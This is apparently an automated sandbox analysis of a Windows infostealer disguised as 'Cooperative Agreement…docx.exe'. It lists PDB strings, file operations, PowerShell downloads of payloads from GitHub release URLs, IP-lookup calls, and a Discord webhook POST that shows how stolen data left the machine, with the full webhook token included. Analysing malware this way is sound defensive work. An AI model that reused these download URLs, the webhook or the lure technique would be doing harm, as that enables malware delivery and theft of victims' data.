                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007196096.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2013089820.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019705632.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: chost.exe, 00000011.00000002.2383172319.00007FFDF7852000.00000040.00000001.01000000.0000000F.sdmp
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007994678.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011208039.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: chost.exe, 00000010.00000003.2011030564.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009137175.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.16.dr
                    Source: Binary string: \4q.pdb source: powershell.exe, 0000004F.00000002.2286266418.0000014E183F7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: chost.exe, 00000010.00000003.2001935182.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2386288251.00007FFE0E143000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: chost.exe, 00000010.00000003.2008471606.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2010088702.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019463574.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: chost.exe, 00000010.00000003.2009525097.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.16.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2006962964.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008304877.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2008471606.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008775784.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.16.dr
                    Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: chost.exe, 00000011.00000002.2386622767.00007FFE120C1000.00000040.00000001.01000000.00000018.sdmp
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009942650.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2005920546.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018181506.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019937163.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008197505.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2010798981.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009942650.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\libssl-3.pdb source: chost.exe, chost.exe, 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmp
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: chost.exe, 00000010.00000003.2015141052.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019463574.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.16.dr
                    Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: chost.exe, 00000011.00000002.2384746452.00007FFDFF141000.00000040.00000001.01000000.00000019.sdmp
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: chost.exe, 00000010.00000003.2015300574.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008611249.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018892218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: chost.exe, 00000011.00000002.2379354062.00007FFDF6EC2000.00000040.00000001.01000000.0000001A.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: chost.exe, 00000010.00000003.2001935182.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2386288251.00007FFE0E143000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011643843.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: chost.exe, 00000010.00000003.2010798981.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008100864.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2017577218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007994678.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007080475.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009401971.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: chost.exe, 00000011.00000002.2384507849.00007FFDFB8E1000.00000040.00000001.01000000.0000001C.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007196096.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2011030564.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018181506.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011824022.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011643843.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2006803490.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: chost.exe, 00000011.00000002.2385791832.00007FFE0121E000.00000040.00000001.01000000.00000014.sdmp
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007080475.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ucrtbase.pdbUGP source: chost.exe, 00000011.00000002.2384267020.00007FFDF7BE1000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.pdb source: powershell.exe, 0000004F.00000002.2251813408.0000014E00CB0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: chost.exe, 00000011.00000002.2385015786.00007FFDFF6A1000.00000040.00000001.01000000.00000017.sdmp
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018892218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011824022.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: chost.exe, 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: chost.exe, 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmp
                    Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: chost.exe, 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmp
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009632951.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2007318540.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: chost.exe, 00000010.00000003.2006803490.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011730854.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: chost.exe, 00000010.00000003.2017577218.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: chost.exe, chost.exe, 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmp
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008197505.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2015300574.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019937163.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.pdbhP5 source: powershell.exe, 0000004F.00000002.2251813408.0000014E00CB0000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011458839.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: chost.exe, 00000010.00000003.2010088702.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: chost.exe, 00000010.00000003.2007431242.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: chost.exe
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: chost.exe, 00000011.00000002.2385510396.00007FFE0029C000.00000040.00000001.01000000.00000013.sdmp
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008304877.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: chost.exe, 00000011.00000002.2386439853.00007FFE11EA1000.00000040.00000001.01000000.0000001D.sdmp
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008775784.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2018415439.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: chost.exe, 00000010.00000003.2009525097.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.16.dr
                    Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: chost.exe, 00000011.00000002.2385277924.00007FFDFF6C1000.00000040.00000001.01000000.00000015.sdmp
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011730854.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943692F0 FindFirstFileExW,FindClose,16_2_00007FF6943692F0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00007FF6943683B0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 16_2_00007FF6943818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00007FF6943818E4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943692F0 FindFirstFileExW,FindClose,17_2_00007FF6943692F0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00007FF6943818E4
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FF6943683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_00007FF6943683B0
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Local\Temp\4713.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile opened: C:\Users\user\Jump to behavior
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/891167481/a56faf23-5067-4d66-b5a8-66cbc7b403dc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183617Z&X-Amz-Expires=300&X-Amz-Signature=05af9abbcf2fda6397f14df92d9672e21ed149afb39203f4783b988b05380976&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dscan000373.jpg&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /newpro008/poh21/releases/download/hu23/chost.exe/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/896881501/caceb723-d9ae-4751-b7b0-81b8adcb2786?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183627Z&X-Amz-Expires=300&X-Amz-Signature=33a7a3fb3cd6638665d2dc4c91930814d62f43cc4ea961c8a1ca69c047be325d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchost.exe&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/891167481/a56faf23-5067-4d66-b5a8-66cbc7b403dc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183617Z&X-Amz-Expires=300&X-Amz-Signature=05af9abbcf2fda6397f14df92d9672e21ed149afb39203f4783b988b05380976&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dscan000373.jpg&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /newpro008/poh21/releases/download/hu23/chost.exe/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/896881501/caceb723-d9ae-4751-b7b0-81b8adcb2786?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183627Z&X-Amz-Expires=300&X-Amz-Signature=33a7a3fb3cd6638665d2dc4c91930814d62f43cc4ea961c8a1ca69c047be325d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchost.exe&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
                    Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: github.com
                    Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: blank-7uov3.in
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: discord.com
                    Source: unknownHTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 446171User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=5645850d9eec13ce7bafd163781539ae
                    Source: chost.exe, 00000010.00000003.2022003495.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                    Source: chost.exe, 00000010.00000003.2004224246.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2003687671.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024109201.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022483004.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002768779.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025325913.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022045387.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000002.2390966378.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023023173.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021380155.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2025346442.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2024298770.0000025C3C160000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002560501.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2002967954.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2022179110.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2021422817.0000025C3C153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
